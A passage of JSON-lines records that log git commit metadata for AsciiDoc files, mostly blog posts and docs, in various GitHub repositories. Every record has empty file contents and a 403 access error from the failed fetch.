2017-03-31-Google-Apps-Script.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_file":"_posts\/2017-03-31-Google-Apps-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06ef075e87892844a982e021b37617e94008d9af","subject":"Update 2018-08-25-Laravel56-Response.adoc","message":"Update 2018-08-25-Laravel56-Response.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_file":"_posts\/2018-08-25-Laravel56-Response.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1291e41862f3c638f5c226d67e45d9b6601cf5ff","subject":"Update \t2014-07-03-forge-2.7.0.final.asciidoc","message":"Update \t2014-07-03-forge-2.7.0.final.asciidoc","repos":"luiz158\/docs,agoncal\/docs,forge\/docs,addonis1990\/docs,luiz158\/docs,addonis1990\/docs,agoncal\/docs,forge\/docs","old_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_file":"news\/ \t2014-07-03-forge-2.7.0.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"8c6e0a8a8d8eebccb6cadd2e9c740309e8283b05","subject":"Update 2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","message":"Update 
2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_file":"_posts\/2017-07-30-Raspberry-Pi-wireless-access-point-an-approach.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b09c276aae0e492a51a6bd0593df3b0380196695","subject":"Update 2016-07-16-Test-Post.adoc","message":"Update 2016-07-16-Test-Post.adoc","repos":"holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io,holtalanm\/holtalanm.github.io","old_file":"_posts\/2016-07-16-Test-Post.adoc","new_file":"_posts\/2016-07-16-Test-Post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/holtalanm\/holtalanm.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"03f95c5ffe8764567822812ffd441cb92ef0e0c6","subject":"recomitting travis","message":"recomitting travis\n","repos":"juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017,juhuntenburg\/gsoc2017","old_file":"_posts\/2017-08-18-Travis_CI.adoc","new_file":"_posts\/2017-08-18-Travis_CI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/juhuntenburg\/gsoc2017.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47d2ba22e8b142c013f4409abb4e79e3fe5bd0c8","subject":"Update 2016-07-20-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","message":"Update 2016-07-20-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_file":"_posts\/2016-07-20-JS-Mapping-Adding-Dynamic-State-and-Filters-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b4decfb017da160c59315937238c6792d87d539","subject":"Add instructions about how to write new recipes","message":"Add instructions about how to write new recipes\n","repos":"melix\/gradle-buildscan-recipes","old_file":"src\/recipes\/README.adoc","new_file":"src\/recipes\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/melix\/gradle-buildscan-recipes.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4886627f792dd26d2bd01267776b035dd1cc117","subject":"add index.html","message":"add index.html\n","repos":"kmisztal\/JImageStream","old_file":"jis-documentation\/src\/index.adoc","new_file":"jis-documentation\/src\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kmisztal\/JImageStream.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5013a4636478b22f0372ce56fa69e95ec0f7f2b7","subject":"add info","message":"add 
info\n","repos":"neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures,neo4j-contrib\/neo4j-apoc-procedures","old_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/config\/apoc.log.info.adoc","new_file":"docs\/asciidoc\/modules\/ROOT\/partials\/usage\/config\/apoc.log.info.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/neo4j-contrib\/neo4j-apoc-procedures.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"75e96c8ec916ad7f6bd4359c952afc99d4b90062","subject":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","message":"Update 2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_file":"_posts\/2016-02-18-Maintain-your-Hub-Press-with-the-latest-version.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa8159d9575c5f09d8e83cc69a7fd6911ecc01b7","subject":"Update 2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","message":"Update 2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","repos":"Sth0nian\/hubpress.io,Sth0nian\/hubpress.io,Sth0nian\/hubpress.io","old_file":"_posts\/2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","new_file":"_posts\/2015-06-15-WFH-culture-and-the-virtual-office-of-science.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Sth0nian\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"10d74a736d4de2ef4640efb9d64adfd98f4b3b60","subject":"Helpful back-end development tips","message":"Helpful back-end development tips\n","repos":"kcrimson\/asciidoctor-reveal.js,kcrimson\/asciidoctor-reveal.js","old_file":"HACKING.adoc","new_file":"HACKING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kcrimson\/asciidoctor-reveal.js.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"49601932ac0ff5df767a8b6a5a2c5056804e12a7","subject":"Update Kaui_Guide_Draft (4) (1).adoc","message":"Update Kaui_Guide_Draft (4) (1).adoc\n","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_file":"userguide\/kaui\/Kaui_Guide_Draft (4) (1).adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5b872e47d0e5d4561be94850e6be90d23b4ae241","subject":"Create aws-standalone.adoc","message":"Create aws-standalone.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/aws-standalone.adoc","new_file":"userguide\/tutorials\/aws-standalone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b2bad57aa104d4a3a4b1bd350c9c93a00d288048","subject":"Update 2016-02-12-Friday-Favorites-What-is-your-favorite-Disney-pizza-place.adoc","message":"Update 2016-02-12-Friday-Favorites-What-is-your-favorite-Disney-pizza-place.adoc","repos":"mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io,mouseguests\/mouseguests.github.io","old_file":"_posts\/2016-02-12-Friday-Favorites-What-is-your-favorite-Disney-pizza-place.adoc","new_file":"_posts\/2016-02-12-Friday-Favorites-What-is-your-favorite-Disney-pizza-place.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mouseguests\/mouseguests.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"45fdebc8b60319b6b6ce19dd6a1fc124003607d1","subject":"y2b create post You've Never Seen A Mouse Do This...","message":"y2b create post You've Never Seen A Mouse Do This...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-12-13-You've%20Never%20Seen%20A%20Mouse%20Do%20This....adoc","new_file":"_posts\/2017-12-13-You've%20Never%20Seen%20A%20Mouse%20Do%20This....adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f5b6654f6edc015ff72d1d3b1ae844595f9289c6","subject":"Create BuildingLinux.adoc","message":"Create BuildingLinux.adoc","repos":"igagis\/svgren,igagis\/svgren,igagis\/svgren","old_file":"wiki\/BuildingLinux.adoc","new_file":"wiki\/BuildingLinux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/igagis\/svgren.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"859ba8f0cb4cbd4fa9722a9f74b7f2a55faaf1c9","subject":"Update 2016-08-27-Best-Practices-for-Express-in-Production-Part-One-Security.adoc","message":"Update 2016-08-27-Best-Practices-for-Express-in-Production-Part-One-Security.adoc","repos":"hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io,hbbalfred\/hbbalfred.github.io","old_file":"_posts\/2016-08-27-Best-Practices-for-Express-in-Production-Part-One-Security.adoc","new_file":"_posts\/2016-08-27-Best-Practices-for-Express-in-Production-Part-One-Security.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hbbalfred\/hbbalfred.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e7245e602f22de83fc5e1b6c489fbf0685740700","subject":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","message":"Update Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_file":"_posts\/Estrategias-inteligentes-Estrategias-inteligentes-S-E-T-A.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"faac0d844da4ed21ef8e755145338f013beb43b7","subject":"Update 2016-6-27-json-decode-json-encode.adoc","message":"Update 2016-6-27-json-decode-json-encode.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_file":"_posts\/2016-6-27-json-decode-json-encode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f8a434c5c5433785e021ee38c0ee71dc2ca7a6b1","subject":"\u7ffb\u8bd1 running-tests","message":"\u7ffb\u8bd1 running-tests","repos":"iresty\/programming-openresty-zh","old_file":"testing\/running-tests.adoc","new_file":"testing\/running-tests.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iresty\/programming-openresty-zh.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"b74b99ff703bb389742bc42a03c3d4450aaef5ab","subject":"Update 2015-06-19-Command-driven-task-execution.adoc","message":"Update 2015-06-19-Command-driven-task-execution.adoc","repos":"der3k\/der3k.github.io,der3k\/der3k.github.io,der3k\/der3k.github.io","old_file":"_posts\/2015-06-19-Command-driven-task-execution.adoc","new_file":"_posts\/2015-06-19-Command-driven-task-execution.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/der3k\/der3k.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c67431714a32fd13aa4ba0a9176a6a35eef3e3ed","subject":"Update 2018-06-04-php-Documentor.adoc","message":"Update 2018-06-04-php-Documentor.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-04-php-Documentor.adoc","new_file":"_posts\/2018-06-04-php-Documentor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"38293abbb59cfa9e248b98438cc0aff43d4636de","subject":"domain docs evolved","message":"domain docs evolved\n","repos":"sergehuber\/contextserver-graphql-api","old_file":"docs\/index.adoc","new_file":"docs\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sergehuber\/contextserver-graphql-api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2010165a9d6ff2cc8ed6e2bafdd372f94695a68e","subject":"Update 2016-05-04-Hello-my-hubpress.adoc","message":"Update 2016-05-04-Hello-my-hubpress.adoc","repos":"lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io,lyqiangmny\/lyqiangmny.github.io","old_file":"_posts\/2016-05-04-Hello-my-hubpress.adoc","new_file":"_posts\/2016-05-04-Hello-my-hubpress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lyqiangmny\/lyqiangmny.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"6db27e06dc28099191b3636f26630193dd982379","subject":"Deleted _posts\/2016-07-03-Rights-and-Duties.adoc","message":"Deleted _posts\/2016-07-03-Rights-and-Duties.adoc","repos":"anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog,anandjagadeesh\/blog","old_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_file":"_posts\/2016-07-03-Rights-and-Duties.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anandjagadeesh\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1b2dadde17b962a6bebee600963fdc622fe8bbc4","subject":"added uber-any images readme","message":"added uber-any images readme\n","repos":"Simplicity-at-Source\/oldplatform,Simplicity-at-Source\/oldplatform,Simplicity-at-Source\/oldplatform","old_file":"meta-images\/uber-any\/README.adoc","new_file":"meta-images\/uber-any\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Simplicity-at-Source\/oldplatform.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e4ab85f966182c8f8c43c3e475b1a46e51dc644d","subject":"`usage.txt` has unnecessary anchor symbol","message":"`usage.txt` has unnecessary anchor symbol\n\nRemove it.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/cli.adoc","new_file":"docs\/cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6c76ff155fd824595def51a48df68686eb00abad","subject":"post(jq): new jq post","message":"post(jq): new jq post\n","repos":"code-troopers\/website,code-troopers\/website,code-troopers\/website","old_file":"site\/content\/blog\/2018-04-26_jq.adoc","new_file":"site\/content\/blog\/2018-04-26_jq.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/code-troopers\/website.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9f009ecf2eb788ea7e1627a01cdd3cf4c802cc3","subject":"Update 2017-08-09-In-Praise-of-Galvanize.adoc","message":"Update 2017-08-09-In-Praise-of-Galvanize.adoc","repos":"ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io,ashelle\/ashelle.github.io","old_file":"_posts\/2017-08-09-In-Praise-of-Galvanize.adoc","new_file":"_posts\/2017-08-09-In-Praise-of-Galvanize.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ashelle\/ashelle.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cf3cbeead24468b81432a7610d1cf39dad268f24","subject":"Update 2016-10-08.adoc","message":"Update 2016-10-08.adoc","repos":"jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study,jjmean2\/server-study","old_file":"_posts\/2016-10-08.adoc","new_file":"_posts\/2016-10-08.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jjmean2\/server-study.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e9ff3d441679a1ddacc0751430872501c35790b1","subject":"Update 2017-02-23.adoc","message":"Update 
2017-02-23.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-23.adoc","new_file":"_posts\/2017-02-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fa7e26a552ebbe12b587d3663b58c541f1feb64f","subject":"Update 2017-01-17-New-blog-Portfolio.adoc","message":"Update 2017-01-17-New-blog-Portfolio.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2017-01-17-New-blog-Portfolio.adoc","new_file":"_posts\/2017-01-17-New-blog-Portfolio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"388a909a0bca827a7d2c49f479386a56401698e3","subject":"Update 2017-11-23-Azure-8.adoc","message":"Update 2017-11-23-Azure-8.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-23-Azure-8.adoc","new_file":"_posts\/2017-11-23-Azure-8.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"07743114aca7a6ac38d240077e7cc3db216fc118","subject":"Update 2015-09-16-Material.adoc","message":"Update 2015-09-16-Material.adoc","repos":"harichen\/harichen.io,harichen\/harichen.io,harichen\/harichen.io","old_file":"_posts\/2015-09-16-Material.adoc","new_file":"_posts\/2015-09-16-Material.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/harichen\/harichen.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f90731319ebedce69f3df20ded79e84074af9622","subject":"Update 2015-05-14-Yeah.adoc","message":"Update 2015-05-14-Yeah.adoc","repos":"flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io,flug\/flug.github.io","old_file":"_posts\/2015-05-14-Yeah.adoc","new_file":"_posts\/2015-05-14-Yeah.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/flug\/flug.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"51de9e986eabaf6906e85fcbaec9b0b6093022f4","subject":"Update 2015-04-14-A-Beginning.adoc","message":"Update 2015-04-14-A-Beginning.adoc","repos":"rh0\/the-myriad-path,rh0\/the-myriad-path,rh0\/the-myriad-path","old_file":"_posts\/2015-04-14-A-Beginning.adoc","new_file":"_posts\/2015-04-14-A-Beginning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/rh0\/the-myriad-path.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8b0ecaf0c92f2eab2ee8697758c5a94dc5bb37d5","subject":"Update 2017-09-18-First-Blog.adoc","message":"Update 
2017-09-18-First-Blog.adoc","repos":"brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io,brendena\/hubpress.io","old_file":"_posts\/2017-09-18-First-Blog.adoc","new_file":"_posts\/2017-09-18-First-Blog.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/brendena\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6dd5bf490ead60a0c34ebfb1e3e6f9e2787f1524","subject":"Update 2017-03-10-K-O-O-V-E-R.adoc","message":"Update 2017-03-10-K-O-O-V-E-R.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-03-10-K-O-O-V-E-R.adoc","new_file":"_posts\/2017-03-10-K-O-O-V-E-R.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a888b902f6c95e6636a465be42d21af29d209326","subject":"docs added","message":"docs added\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0429095b699c3fd62af0bb9efff89b4b7ff8c4ff","subject":"update doc","message":"update doc\n","repos":"alannesta\/fis3,xtidt\/fis3,Brother-Simon\/fis3,BobJavascript\/fis3,fengshao0907\/fis3,Suninus\/fis3,nieying\/fis3,philip8728\/fis3,liaolunhui\/fis3,FrancesShih\/fis3,sweet3c\/fis3,7213\/fis3,FrancesShih\/fis3,magicstf\/fis3,blue2sky\/fis3,jincdream\/fis3,philip8728\/fis3,wenyang12\/fis3,fengshao0907\/fis3,sxlfzhy\/fis3,atian25\/fis3,liukaijv\/fis3,samlin08\/fis3,loopnz\/fis3,BobJavascript\/fis3,alannesta\/fis3,jy03078959\/fis3,lpshan\/fis3,liukaijv\/fis3,alannesta\/fis3,enng0227\/fis3,ybg555\/fis3,taohaoge\/fis3,blue2sky\/fis3,atian25\/fis3,jy03078959\/fis3,lpshan\/fis3,fex-team\/fis3,7213\/fis3,richard-chen-1985\/fis3,blue2sky\/fis3,shijunwei\/fis3,sweet3c\/fis3,gaoxiaopang\/fis3,aifeld\/fis3,7213\/fis3,jy03078959\/fis3,samlin08\/fis3,loopnz\/fis3,ybg555\/fis3,nieying\/fis3,krock01\/fis3,sweet3c\/fis3,FrancesShih\/fis3,jincdream\/fis3,mircle\/fis3,nieying\/fis3,gaoxiaopang\/fis3,taohaoge\/fis3,Suninus\/fis3,taohaoge\/fis3,aifeld\/fis3,blue2sky\/fis3,philip8728\/fis3,evilemon\/fis3,krock01\/fis3,enng0227\/fis3,sxlfzhy\/fis3,krock01\/fis3,nieying\/fis3,krock01\/fis3,taohaoge\/fis3,liukaijv\/fis3,fex-team\/fis3,sxlfzhy\/fis3,Brother-Simon\/fis3,blue2sky\/fis3,Brother-Simon\/fis3,Suninus\/fis3,xtidt\/fis3,evilemon\/fis3,jy03078959\/fis3,richard-chen-1985\/fis3,FrancesShih\/fis3,Brother-Simon\/fis3,fengshao0907\/fis3,sweet3c\/fis3,fex-team\/fis3,philip8728\/fis3,liukaijv\/fis3,samlin08\/fis3,krock01\/fis3,wenyang12\/fis3,sxlfzhy\/fis3,fex-team\/fis3,liukaijv\/fis3,charleschaochen\/fis3,jincdream\/fis3,loopnz\/fis3,enng0227\/fis3,taohaoge\/fis3,evilemon\/fis3,shijunwei\/fis3,enng0227\/fis3,BobJavascript\/fis3,mircle\/fis3,charleschaochen\/fis3,charleschaochen\/fis3,liaolunhui\/fis3,hechunwen\/fis3,xtidt\/fis3,7213\/fis3,yonglehou\/fis3,BobJavascript\/fis3,Brother-Simon\/fis3,samlin08\/fis3,richard-chen-1985\/fis3,magicstf\/fis3,magicstf\/fis3,yonglehou\/fis3,fengshao
0907\/fis3,enng0227\/fis3,jincdream\/fis3,alannesta\/fis3,fex-team\/fis3,shijunwei\/fis3,wenyang12\/fis3,ybg555\/fis3,shijunwei\/fis3,atian25\/fis3,evilemon\/fis3,fengshao0907\/fis3,liaolunhui\/fis3,mircle\/fis3,xtidt\/fis3,hechunwen\/fis3,lpshan\/fis3,philip8728\/fis3,aifeld\/fis3,alannesta\/fis3,7213\/fis3,shijunwei\/fis3,nieying\/fis3,ybg555\/fis3,magicstf\/fis3,Suninus\/fis3,charleschaochen\/fis3,mircle\/fis3,liaolunhui\/fis3,sxlfzhy\/fis3,gaoxiaopang\/fis3,gaoxiaopang\/fis3,aifeld\/fis3,atian25\/fis3,charleschaochen\/fis3,lpshan\/fis3,wenyang12\/fis3,atian25\/fis3,yonglehou\/fis3,samlin08\/fis3,gaoxiaopang\/fis3,jy03078959\/fis3,loopnz\/fis3,yonglehou\/fis3,richard-chen-1985\/fis3,wenyang12\/fis3,lpshan\/fis3,aifeld\/fis3,hechunwen\/fis3,hechunwen\/fis3,liaolunhui\/fis3","old_file":"doc\/index.adoc","new_file":"doc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alannesta\/fis3.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"7105e63bf2fc9c7b8d3f43db47b9cd76a8fa65ee","subject":"initial cut of reworked GEP-7","message":"initial cut of reworked GEP-7\n","repos":"groovy\/groovy-website,groovy\/groovy-website","old_file":"site\/src\/site\/wiki\/GEP-7.adoc","new_file":"site\/src\/site\/wiki\/GEP-7.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/groovy\/groovy-website.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f9f10d26fbfcf1af274987e65b12e549ec31bed8","subject":"Update 2017-04-06-La-curiosita.adoc","message":"Update 2017-04-06-La-curiosita.adoc","repos":"justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io,justafool5\/justafool5.github.io","old_file":"_posts\/2017-04-06-La-curiosita.adoc","new_file":"_posts\/2017-04-06-La-curiosita.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/justafool5\/justafool5.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 